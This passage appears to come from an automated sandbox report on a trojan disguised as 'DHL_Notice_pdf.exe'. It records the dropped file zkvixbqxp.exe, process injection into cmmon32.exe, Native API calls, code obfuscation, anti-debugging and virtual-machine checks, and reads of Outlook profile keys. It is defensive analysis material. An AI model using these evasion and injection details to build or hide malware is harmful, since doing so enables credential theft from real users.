Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 5_2_04529540 NtReadFile,LdrInitializeThunk, 5_2_04529540
Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 5_2_04529560 NtWriteFile,LdrInitializeThunk, 5_2_04529560
Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 5_2_045295D0 NtClose,LdrInitializeThunk, 5_2_045295D0
Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 5_2_04529650 NtQueryValueKey,LdrInitializeThunk, 5_2_04529650
Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 5_2_04529660 NtAllocateVirtualMemory,LdrInitializeThunk, 5_2_04529660
Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 5_2_04529610 NtEnumerateValueKey,LdrInitializeThunk, 5_2_04529610
Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 5_2_045296D0 NtCreateKey,LdrInitializeThunk, 5_2_045296D0
Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 5_2_045296E0 NtFreeVirtualMemory,LdrInitializeThunk, 5_2_045296E0
Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 5_2_04529710 NtQueryInformationToken,LdrInitializeThunk, 5_2_04529710
Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 5_2_04529FE0 NtCreateMutant,LdrInitializeThunk, 5_2_04529FE0
Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 5_2_04529780 NtMapViewOfSection,LdrInitializeThunk, 5_2_04529780
Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 5_2_04529840 NtDelayExecution,LdrInitializeThunk, 5_2_04529840
Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 5_2_04529860 NtQuerySystemInformation,LdrInitializeThunk, 5_2_04529860
Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 5_2_04529910 NtAdjustPrivilegesToken,LdrInitializeThunk, 5_2_04529910
Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 5_2_045299A0 NtCreateSection,LdrInitializeThunk, 5_2_045299A0
Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 5_2_04529A50 NtCreateFile,LdrInitializeThunk, 5_2_04529A50
Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 5_2_0452AD30 NtSetContextThread, 5_2_0452AD30
Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 5_2_04529520 NtWaitForSingleObject, 5_2_04529520
Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 5_2_045295F0 NtQueryInformationFile, 5_2_045295F0
Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 5_2_04529670 NtQueryInformationProcess, 5_2_04529670
Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 5_2_0452A770 NtOpenThread, 5_2_0452A770
Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 5_2_04529770 NtSetInformationFile, 5_2_04529770
Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 5_2_04529760 NtOpenProcess, 5_2_04529760
Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 5_2_0452A710 NtOpenProcessToken, 5_2_0452A710
Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 5_2_04529730 NtQueryVirtualMemory, 5_2_04529730
Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 5_2_045297A0 NtUnmapViewOfSection, 5_2_045297A0
Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 5_2_0452B040 NtSuspendThread, 5_2_0452B040
Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 5_2_04529820 NtEnumerateKey, 5_2_04529820
Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 5_2_045298F0 NtReadVirtualMemory, 5_2_045298F0
Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 5_2_045298A0 NtWriteVirtualMemory, 5_2_045298A0
Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 5_2_04529950 NtQueueApcThread, 5_2_04529950
Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 5_2_045299D0 NtCreateProcessEx, 5_2_045299D0
Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 5_2_04529A10 NtQuerySection, 5_2_04529A10
Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 5_2_04529A00 NtProtectVirtualMemory, 5_2_04529A00
Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 5_2_04529A20 NtResumeThread, 5_2_04529A20
Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 5_2_04529A80 NtOpenDirectoryObject, 5_2_04529A80
Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 5_2_04529B00 NtSetValueKey, 5_2_04529B00
Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 5_2_0452A3B0 NtGetContextThread, 5_2_0452A3B0
Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 5_2_027DC870 NtClose, 5_2_027DC870
Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 5_2_027DC840 NtDeleteFile, 5_2_027DC840
Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 5_2_027DC920 NtAllocateVirtualMemory, 5_2_027DC920
Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 5_2_027DC740 NtCreateFile, 5_2_027DC740
Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 5_2_027DC7F0 NtReadFile, 5_2_027DC7F0
Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 5_2_027DC73B NtCreateFile, 5_2_027DC73B
Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 5_2_027DC7EA NtReadFile, 5_2_027DC7EA
Source: DHL_Notice_pdf.exe ReversingLabs: Detection: 46%
Source: DHL_Notice_pdf.exe Virustotal: Detection: 42%
Source: C:\Users\user\Desktop\DHL_Notice_pdf.exe File read: C:\Users\user\Desktop\DHL_Notice_pdf.exe Jump to behavior
Source: DHL_Notice_pdf.exe Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
Source: C:\Users\user\Desktop\DHL_Notice_pdf.exe Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers Jump to behavior
Source: unknown Process created: C:\Users\user\Desktop\DHL_Notice_pdf.exe C:\Users\user\Desktop\DHL_Notice_pdf.exe
Source: C:\Users\user\Desktop\DHL_Notice_pdf.exe Process created: C:\Users\user\AppData\Local\Temp\zkvixbqxp.exe "C:\Users\user\AppData\Local\Temp\zkvixbqxp.exe" C:\Users\user\AppData\Local\Temp\thztifyh.t
Source: C:\Users\user\AppData\Local\Temp\zkvixbqxp.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\AppData\Local\Temp\zkvixbqxp.exe Process created: C:\Users\user\AppData\Local\Temp\zkvixbqxp.exe C:\Users\user\AppData\Local\Temp\zkvixbqxp.exe
Source: C:\Windows\explorer.exe Process created: C:\Windows\SysWOW64\cmmon32.exe C:\Windows\SysWOW64\cmmon32.exe
Source: C:\Users\user\Desktop\DHL_Notice_pdf.exe Process created: C:\Users\user\AppData\Local\Temp\zkvixbqxp.exe "C:\Users\user\AppData\Local\Temp\zkvixbqxp.exe" C:\Users\user\AppData\Local\Temp\thztifyh.t Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\zkvixbqxp.exe Process created: C:\Users\user\AppData\Local\Temp\zkvixbqxp.exe C:\Users\user\AppData\Local\Temp\zkvixbqxp.exe Jump to behavior
Source: C:\Windows\explorer.exe Process created: C:\Windows\SysWOW64\cmmon32.exe C:\Windows\SysWOW64\cmmon32.exe Jump to behavior
Source: C:\Users\user\Desktop\DHL_Notice_pdf.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{1f486a52-3cb1-48fd-8f50-b8dc300d9f9d}\InProcServer32 Jump to behavior
Source: C:\Users\user\Desktop\DHL_Notice_pdf.exe Code function: 0_2_00403640 EntryPoint,SetErrorMode,GetVersionExW,GetVersionExW,GetVersionExW,lstrlenA,#17,OleInitialize,SHGetFileInfoW,GetCommandLineW,CharNextW,GetTempPathW,GetTempPathW,GetWindowsDirectoryW,lstrcatW,GetTempPathW,lstrcatW,SetEnvironmentVariableW,SetEnvironmentVariableW,SetEnvironmentVariableW,DeleteFileW,lstrcatW,lstrcatW,lstrcatW,lstrcmpiW,SetCurrentDirectoryW,DeleteFileW,CopyFileW,CloseHandle,ExitProcess,OleUninitialize,ExitProcess,GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueW,AdjustTokenPrivileges,ExitWindowsEx,ExitProcess, 0_2_00403640
Source: C:\Windows\explorer.exe File created: C:\Users\user\AppData\Local\Microsoft\Windows\WER\ERC\statecache.lock Jump to behavior
Source: C:\Users\user\Desktop\DHL_Notice_pdf.exe File created: C:\Users\user\AppData\Local\Temp\nsd7F3B.tmp Jump to behavior
Source: classification engine Classification label: mal100.troj.spyw.evad.winEXE@8/5@14/7
Source: C:\Users\user\Desktop\DHL_Notice_pdf.exe Code function: 0_2_004021AA CoCreateInstance, 0_2_004021AA
Source: C:\Users\user\Desktop\DHL_Notice_pdf.exe File read: C:\Users\desktop.ini Jump to behavior
Source: C:\Users\user\Desktop\DHL_Notice_pdf.exe Code function: 0_2_00404AB5 GetDlgItem,SetWindowTextW,SHBrowseForFolderW,CoTaskMemFree,lstrcmpiW,lstrcatW,SetDlgItemTextW,GetDiskFreeSpaceW,MulDiv,SetDlgItemTextW, 0_2_00404AB5
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6132:120:WilError_01
Source: C:\Windows\explorer.exe File read: C:\Windows\System32\drivers\etc\hosts Jump to behavior
Source: C:\Windows\explorer.exe File read: C:\Windows\System32\drivers\etc\hosts Jump to behavior
Source: C:\Windows\SysWOW64\cmmon32.exe Key opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office\15.0\Outlook\Profiles\Outlook\ Jump to behavior
Source: DHL_Notice_pdf.exe Static PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
Source: Binary string: cmmon32.pdb source: zkvixbqxp.exe, 00000003.00000002.274188632.0000000000920000.00000040.10000000.00040000.00000000.sdmp
Source: Binary string: cmmon32.pdbGCTL source: zkvixbqxp.exe, 00000003.00000002.274188632.0000000000920000.00000040.10000000.00040000.00000000.sdmp
Source: Binary string: wntdll.pdbUGP source: zkvixbqxp.exe, 00000001.00000003.241452408.0000000019FF0000.00000004.00001000.00020000.00000000.sdmp, zkvixbqxp.exe, 00000001.00000003.241643888.000000001A180000.00000004.00001000.00020000.00000000.sdmp, zkvixbqxp.exe, 00000003.00000002.274212822.0000000000AEF000.00000040.00001000.00020000.00000000.sdmp, zkvixbqxp.exe, 00000003.00000002.274212822.00000000009D0000.00000040.00001000.00020000.00000000.sdmp, zkvixbqxp.exe, 00000003.00000003.245869729.0000000000838000.00000004.00000020.00020000.00000000.sdmp, cmmon32.exe, 00000005.00000002.505725173.00000000045DF000.00000040.00001000.00020000.00000000.sdmp, cmmon32.exe, 00000005.00000002.505725173.00000000044C0000.00000040.00001000.00020000.00000000.sdmp, cmmon32.exe, 00000005.00000003.273703792.0000000004189000.00000004.00000020.00020000.00000000.sdmp, cmmon32.exe, 00000005.00000003.275305652.000000000432B000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: wntdll.pdb source: zkvixbqxp.exe, zkvixbqxp.exe, 00000003.00000002.274212822.0000000000AEF000.00000040.00001000.00020000.00000000.sdmp, zkvixbqxp.exe, 00000003.00000002.274212822.00000000009D0000.00000040.00001000.00020000.00000000.sdmp, zkvixbqxp.exe, 00000003.00000003.245869729.0000000000838000.00000004.00000020.00020000.00000000.sdmp, cmmon32.exe, cmmon32.exe, 00000005.00000002.505725173.00000000045DF000.00000040.00001000.00020000.00000000.sdmp, cmmon32.exe, 00000005.00000002.505725173.00000000044C0000.00000040.00001000.00020000.00000000.sdmp, cmmon32.exe, 00000005.00000003.273703792.0000000004189000.00000004.00000020.00020000.00000000.sdmp, cmmon32.exe, 00000005.00000003.275305652.000000000432B000.00000004.00000020.00020000.00000000.sdmp

Data Obfuscation
barindex
Detected unpacking (changes PE section rights)
Source: C:\Users\user\AppData\Local\Temp\zkvixbqxp.exe Unpacked PE file: 3.2.zkvixbqxp.exe.400000.0.unpack .text:ER;.rdata:R;.data:W; vs .text:ER;
Uses code obfuscation techniques (call, push, ret)
Source: C:\Users\user\AppData\Local\Temp\zkvixbqxp.exe Code function: 3_2_0041B1FB push esi; iretd 3_2_0041B1FC
Source: C:\Users\user\AppData\Local\Temp\zkvixbqxp.exe Code function: 3_2_0040DAA5 push edi; retf 3_2_0040DAAE
Source: C:\Users\user\AppData\Local\Temp\zkvixbqxp.exe Code function: 3_2_0041B369 push es; retf 3_2_0041B3A3
Source: C:\Users\user\AppData\Local\Temp\zkvixbqxp.exe Code function: 3_2_00422C58 push dword ptr [057DC0C6h]; ret 3_2_00422C7C
Source: C:\Users\user\AppData\Local\Temp\zkvixbqxp.exe Code function: 3_2_0041C4AA push ecx; retf 3_2_0041C4AF
Source: C:\Users\user\AppData\Local\Temp\zkvixbqxp.exe Code function: 3_2_0041BDCE push esp; ret 3_2_0041BDCF
Source: C:\Users\user\AppData\Local\Temp\zkvixbqxp.exe Code function: 3_2_00401DF0 push eax; ret 3_2_00401DF2
Source: C:\Users\user\AppData\Local\Temp\zkvixbqxp.exe Code function: 3_2_00406F32 push C87026BFh; retf 3_2_00406F37
Source: C:\Users\user\AppData\Local\Temp\zkvixbqxp.exe Code function: 3_2_00A4D0D1 push ecx; ret 3_2_00A4D0E4
Source: C:\Windows\explorer.exe Code function: 4_2_0B736F57 push ebx; retn 4855h 4_2_0B736F60
Source: C:\Windows\explorer.exe Code function: 4_2_0B73213D push ds; iretd 4_2_0B732141
Source: C:\Windows\explorer.exe Code function: 4_2_0B736EC9 push cs; retf 4_2_0B736ECA
Source: C:\Windows\explorer.exe Code function: 4_2_1194113D push ds; iretd 4_2_11941141
Source: C:\Windows\explorer.exe Code function: 4_2_11945EC9 push cs; retf 4_2_11945ECA
Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 5_2_0453D0D1 push ecx; ret 5_2_0453D0E4
Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 5_2_027C513F push C87026BFh; retf 5_2_027C5144
Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 5_2_027E0E65 push dword ptr [057DC0C6h]; ret 5_2_027E0E89
Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 5_2_027DA6B7 push ecx; retf 5_2_027DA6BC
Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 5_2_027D9FDB push esp; ret 5_2_027D9FDC
Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 5_2_027D9408 push esi; iretd 5_2_027D9409
Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 5_2_027CBCB2 push edi; retf 5_2_027CBCBB
Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 5_2_027D9576 push es; retf 5_2_027D95B0
Drops PE files
Source: C:\Users\user\Desktop\DHL_Notice_pdf.exe File created: C:\Users\user\AppData\Local\Temp\zkvixbqxp.exe Jump to dropped file
Source: C:\Users\user\Desktop\DHL_Notice_pdf.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\explorer.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\explorer.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\cmmon32.exe Process information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\cmmon32.exe Process information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\cmmon32.exe Process information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\cmmon32.exe Process information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\cmmon32.exe Process information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX Jump to behavior

Malware Analysis System Evasion
barindex
Found evasive API chain (may stop execution after reading information in the PEB, e.g. number of processors)
Source: C:\Users\user\AppData\Local\Temp\zkvixbqxp.exe Evasive API call chain: GetPEB, DecisionNodes, ExitProcess
May sleep (evasive loops) to hinder dynamic analysis
Source: C:\Windows\explorer.exe TID: 5172 Thread sleep time: -30000s >= -30000s Jump to behavior
Source: C:\Windows\SysWOW64\cmmon32.exe TID: 5128 Thread sleep time: -54000s >= -30000s Jump to behavior
Sample execution stops while process was sleeping (likely an evasion)
Source: C:\Windows\System32\conhost.exe Last function: Thread delayed
Source: C:\Windows\SysWOW64\cmmon32.exe Last function: Thread delayed
Source: C:\Windows\SysWOW64\cmmon32.exe Last function: Thread delayed
Contains functionality for execution timing, often used to detect debuggers
Source: C:\Users\user\AppData\Local\Temp\zkvixbqxp.exe Code function: 3_2_00A26A60 rdtscp 3_2_00A26A60
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Source: C:\Windows\explorer.exe Window / User API: foregroundWindowGot 879 Jump to behavior
Source: C:\Windows\explorer.exe Window / User API: foregroundWindowGot 871 Jump to behavior
Found large amount of non-executed APIs
Source: C:\Users\user\AppData\Local\Temp\zkvixbqxp.exe API coverage: 6.5 %
Source: C:\Windows\SysWOW64\cmmon32.exe API coverage: 8.4 %
Source: C:\Users\user\AppData\Local\Temp\zkvixbqxp.exe Process information queried: ProcessInformation Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\zkvixbqxp.exe Code function: 1_2_004207DA GetSystemInfo, 1_2_004207DA
Source: C:\Users\user\Desktop\DHL_Notice_pdf.exe Code function: 0_2_00405D74 CloseHandle,GetTempPathW,DeleteFileW,lstrcatW,lstrcatW,lstrlenW,FindFirstFileW,FindNextFileW,FindClose, 0_2_00405D74
Source: C:\Users\user\Desktop\DHL_Notice_pdf.exe Code function: 0_2_0040699E FindFirstFileW,FindClose, 0_2_0040699E
Source: C:\Users\user\Desktop\DHL_Notice_pdf.exe Code function: 0_2_0040290B FindFirstFileW, 0_2_0040290B
Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 5_2_027D31A0 FindFirstFileW,FindNextFileW,FindClose, 5_2_027D31A0
Source: C:\Users\user\Desktop\DHL_Notice_pdf.exe API call chain: ExitProcess graph end node
Source: explorer.exe, 00000004.00000003.473645916.000000000F4FB000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000002.514671889.000000000F4FD000.00000004.00000001.00020000.00000000.sdmp Binary or memory string: Hyper-V RAW5
Source: explorer.exe, 00000004.00000002.512635154.00000000090D8000.00000004.00000001.00020000.00000000.sdmp Binary or memory string: \\?\scsi#cdrom&ven_necvmwar&prod_vmware_sata_cd00#5&280b647&0&000000#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}z,
Source: explorer.exe, 00000004.00000002.512635154.00000000090D8000.00000004.00000001.00020000.00000000.sdmp Binary or memory string: SCSI\CDROM&VEN_NECVMWAR&PROD_VMWARE_SATA_CD00\5&280B647&0&000000
Source: explorer.exe, 00000004.00000000.253345613.0000000007166000.00000004.00000001.00020000.00000000.sdmp Binary or memory string: \\?\scsi#cdrom&ven_necvmwar&prod_vmware_sata_cd00#5&280b647&0&000000#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}>
Source: explorer.exe, 00000004.00000003.476512956.0000000009054000.00000004.00000001.00020000.00000000.sdmp Binary or memory string: SCSI\Disk&Ven_VMware&Prod_Virtual_disk\5&1ec51bf7&0&0000001 ZG
Source: explorer.exe, 00000004.00000002.512635154.00000000090D8000.00000004.00000001.00020000.00000000.sdmp Binary or memory string: \\?\scsi#cdrom&ven_necvmwar&prod_vmware_sata_cd00#5&280b647&0&000000#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}i,
Source: explorer.exe, 00000004.00000000.250169139.0000000005063000.00000004.00000001.00020000.00000000.sdmp Binary or memory string: \\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}9'
Source: explorer.exe, 00000004.00000002.514284558.000000000F270000.00000004.00000001.00020000.00000000.sdmp Binary or memory string: Hyper-V RAWua%SystemRoot%\system32\mswsock.dllEdgeSquare44x44.pngY
Source: explorer.exe, 00000004.00000003.476512956.0000000009054000.00000004.00000001.00020000.00000000.sdmp Binary or memory string: SCSI\CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00\5&280b647&0&000000
Contains functionality for execution timing, often used to detect debuggers
Source: C:\Users\user\AppData\Local\Temp\zkvixbqxp.exe Code function: 3_2_00A26A60 rdtscp 3_2_00A26A60
Enables debug privileges
Source: C:\Users\user\AppData\Local\Temp\zkvixbqxp.exe Process token adjusted: Debug Jump to behavior
Contains functionality to read the PEB
Source: C:\Users\user\AppData\Local\Temp\zkvixbqxp.exe Code function: 1_2_00420109 mov eax, dword ptr fs:[00000030h] 1_2_00420109
Source: C:\Users\user\AppData\Local\Temp\zkvixbqxp.exe Code function: 1_2_0042005F mov eax, dword ptr fs:[00000030h] 1_2_0042005F
Source: C:\Users\user\AppData\Local\Temp\zkvixbqxp.exe Code function: 1_2_0042017B mov eax, dword ptr fs:[00000030h] 1_2_0042017B
Source: C:\Users\user\AppData\Local\Temp\zkvixbqxp.exe Code function: 1_2_0042013E mov eax, dword ptr fs:[00000030h] 1_2_0042013E
Source: C:\Users\user\AppData\Local\Temp\zkvixbqxp.exe Code function: 3_2_00A220A0 mov eax, dword ptr fs:[00000030h] 3_2_00A220A0
Source: C:\Users\user\AppData\Local\Temp\zkvixbqxp.exe Code function: 3_2_00A220A0 mov eax, dword ptr fs:[00000030h] 3_2_00A220A0
Source: C:\Users\user\AppData\Local\Temp\zkvixbqxp.exe Code function: 3_2_00A220A0 mov eax, dword ptr fs:[00000030h] 3_2_00A220A0
Source: C:\Users\user\AppData\Local\Temp\zkvixbqxp.exe Code function: 3_2_00A220A0 mov eax, dword ptr fs:[00000030h] 3_2_00A220A0
Source: C:\Users\user\AppData\Local\Temp\zkvixbqxp.exe Code function: 3_2_00A220A0 mov eax, dword ptr fs:[00000030h] 3_2_00A220A0
Source: C:\Users\user\AppData\Local\Temp\zkvixbqxp.exe Code function: 3_2_00A220A0 mov eax, dword ptr fs:[00000030h] 3_2_00A220A0
Source: C:\Users\user\AppData\Local\Temp\zkvixbqxp.exe Code function: 3_2_00A390AF mov eax, dword ptr fs:[00000030h] 3_2_00A390AF
Source: C:\Users\user\AppData\Local\Temp\zkvixbqxp.exe Code function: 3_2_00A2F0BF mov ecx, dword ptr fs:[00000030h] 3_2_00A2F0BF
Source: C:\Users\user\AppData\Local\Temp\zkvixbqxp.exe Code function: 3_2_00A2F0BF mov eax, dword ptr fs:[00000030h] 3_2_00A2F0BF
Source: C:\Users\user\AppData\Local\Temp\zkvixbqxp.exe Code function: 3_2_00A2F0BF mov eax, dword ptr fs:[00000030h] 3_2_00A2F0BF
Source: C:\Users\user\AppData\Local\Temp\zkvixbqxp.exe Code function: 3_2_009F9080 mov eax, dword ptr fs:[00000030h] 3_2_009F9080
Source: C:\Users\user\AppData\Local\Temp\zkvixbqxp.exe Code function: 3_2_00A73884 mov eax, dword ptr fs:[00000030h] 3_2_00A73884
Source: C:\Users\user\AppData\Local\Temp\zkvixbqxp.exe Code function: 3_2_00A73884 mov eax, dword ptr fs:[00000030h] 3_2_00A73884
Source: C:\Users\user\AppData\Local\Temp\zkvixbqxp.exe Code function: 3_2_00A1B8E4 mov eax, dword ptr fs:[00000030h] 3_2_00A1B8E4
Source: C:\Users\user\AppData\Local\Temp\zkvixbqxp.exe Code function: 3_2_00A1B8E4 mov eax, dword ptr fs:[00000030h] 3_2_00A1B8E4
Source: C:\Users\user\AppData\Local\Temp\zkvixbqxp.exe Code function: 3_2_009F58EC mov eax, dword ptr fs:[00000030h] 3_2_009F58EC
Source: C:\Users\user\AppData\Local\Temp\zkvixbqxp.exe Code function: 3_2_00A8B8D0 mov eax, dword ptr fs:[00000030h] 3_2_00A8B8D0
Source: C:\Users\user\AppData\Local\Temp\zkvixbqxp.exe Code function: 3_2_00A8B8D0 mov ecx, dword ptr fs:[00000030h] 3_2_00A8B8D0
Source: C:\Users\user\AppData\Local\Temp\zkvixbqxp.exe Code function: 3_2_00A8B8D0 mov eax, dword ptr fs:[00000030h] 3_2_00A8B8D0
Source: C:\Users\user\AppData\Local\Temp\zkvixbqxp.exe Code function: 3_2_00A8B8D0 mov eax, dword ptr fs:[00000030h] 3_2_00A8B8D0
Source: C:\Users\user\AppData\Local\Temp\zkvixbqxp.exe Code function: 3_2_00A8B8D0 mov eax, dword ptr fs:[00000030h] 3_2_00A8B8D0
Source: C:\Users\user\AppData\Local\Temp\zkvixbqxp.exe Code function: 3_2_00A8B8D0 mov eax, dword ptr fs:[00000030h] 3_2_00A8B8D0
Source: C:\Users\user\AppData\Local\Temp\zkvixbqxp.exe Code function: 3_2_009F40E1 mov eax, dword ptr fs:[00000030h] 3_2_009F40E1
Source: C:\Users\user\AppData\Local\Temp\zkvixbqxp.exe Code function: 3_2_009F40E1 mov eax, dword ptr fs:[00000030h] 3_2_009F40E1
Source: C:\Users\user\AppData\Local\Temp\zkvixbqxp.exe Code function: 3_2_009F40E1 mov eax, dword ptr fs:[00000030h] 3_2_009F40E1
Source: C:\Users\user\AppData\Local\Temp\zkvixbqxp.exe Code function: 3_2_00A0B02A mov eax, dword ptr fs:[00000030h] 3_2_00A0B02A
Source: C:\Users\user\AppData\Local\Temp\zkvixbqxp.exe Code function: 3_2_00A0B02A mov eax, dword ptr fs:[00000030h] 3_2_00A0B02A
Source: C:\Users\user\AppData\Local\Temp\zkvixbqxp.exe Code function: 3_2_00A0B02A mov eax, dword ptr fs:[00000030h] 3_2_00A0B02A
Source: C:\Users\user\AppData\Local\Temp\zkvixbqxp.exe Code function: 3_2_00A0B02A mov eax, dword ptr fs:[00000030h] 3_2_00A0B02A
Source: C:\Users\user\AppData\Local\Temp\zkvixbqxp.exe Code function: 3_2_00A2002D mov eax, dword ptr fs:[00000030h] 3_2_00A2002D
Source: C:\Users\user\AppData\Local\Temp\zkvixbqxp.exe Code function: 3_2_00A2002D mov eax, dword ptr fs:[00000030h] 3_2_00A2002D
Source: C:\Users\user\AppData\Local\Temp\zkvixbqxp.exe Code function: 3_2_00A2002D mov eax, dword ptr fs:[00000030h] 3_2_00A2002D
Source: C:\Users\user\AppData\Local\Temp\zkvixbqxp.exe Code function: 3_2_00A2002D mov eax, dword ptr fs:[00000030h] 3_2_00A2002D
Source: C:\Users\user\AppData\Local\Temp\zkvixbqxp.exe Code function: 3_2_00A2002D mov eax, dword ptr fs:[00000030h] 3_2_00A2002D
Source: C:\Users\user\AppData\Local\Temp\zkvixbqxp.exe Code function: 3_2_00A1A830 mov eax, dword ptr fs:[00000030h] 3_2_00A1A830
Source: C:\Users\user\AppData\Local\Temp\zkvixbqxp.exe Code function: 3_2_00A1A830 mov eax, dword ptr fs:[00000030h] 3_2_00A1A830
Source: C:\Users\user\AppData\Local\Temp\zkvixbqxp.exe Code function: 3_2_00A1A830 mov eax, dword ptr fs:[00000030h] 3_2_00A1A830
Source: C:\Users\user\AppData\Local\Temp\zkvixbqxp.exe Code function: 3_2_00A1A830 mov eax, dword ptr fs:[00000030h] 3_2_00A1A830
Source: C:\Users\user\AppData\Local\Temp\zkvixbqxp.exe Code function: 3_2_00A77016 mov eax, dword ptr fs:[00000030h] 3_2_00A77016
Source: C:\Users\user\AppData\Local\Temp\zkvixbqxp.exe Code function: 3_2_00A77016 mov eax, dword ptr fs:[00000030h] 3_2_00A77016
Source: C:\Users\user\AppData\Local\Temp\zkvixbqxp.exe Code function: 3_2_00A77016 mov eax, dword ptr fs:[00000030h] 3_2_00A77016
Source: C:\Users\user\AppData\Local\Temp\zkvixbqxp.exe Code function: 3_2_00AC4015 mov eax, dword ptr fs:[00000030h] 3_2_00AC4015
Source: C:\Users\user\AppData\Local\Temp\zkvixbqxp.exe Code function: 3_2_00AC4015 mov eax, dword ptr fs:[00000030h] 3_2_00AC4015
Source: C:\Users\user\AppData\Local\Temp\zkvixbqxp.exe Code function: 3_2_00AB2073 mov eax, dword ptr fs:[00000030h] 3_2_00AB2073
Source: C:\Users\user\AppData\Local\Temp\zkvixbqxp.exe Code function: 3_2_00AC1074 mov eax, dword ptr fs:[00000030h] 3_2_00AC1074
Source: C:\Users\user\AppData\Local\Temp\zkvixbqxp.exe Code function: 3_2_00A10050 mov eax, dword ptr fs:[00000030h] 3_2_00A10050
Source: C:\Users\user\AppData\Local\Temp\zkvixbqxp.exe Code function: 3_2_00A10050 mov eax, dword ptr fs:[00000030h] 3_2_00A10050
Source: C:\Users\user\AppData\Local\Temp\zkvixbqxp.exe Code function: 3_2_00A769A6 mov eax, dword ptr fs:[00000030h] 3_2_00A769A6
Source: C:\Users\user\AppData\Local\Temp\zkvixbqxp.exe Code function: 3_2_00A261A0 mov eax, dword ptr fs:[00000030h] 3_2_00A261A0
Source: C:\Users\user\AppData\Local\Temp\zkvixbqxp.exe Code function: 3_2_00A261A0 mov eax, dword ptr fs:[00000030h] 3_2_00A261A0
Source: C:\Users\user\AppData\Local\Temp\zkvixbqxp.exe Code function: 3_2_00AB49A4 mov eax, dword ptr fs:[00000030h] 3_2_00AB49A4
Source: C:\Users\user\AppData\Local\Temp\zkvixbqxp.exe Code function: 3_2_00AB49A4 mov eax, dword ptr fs:[00000030h] 3_2_00AB49A4
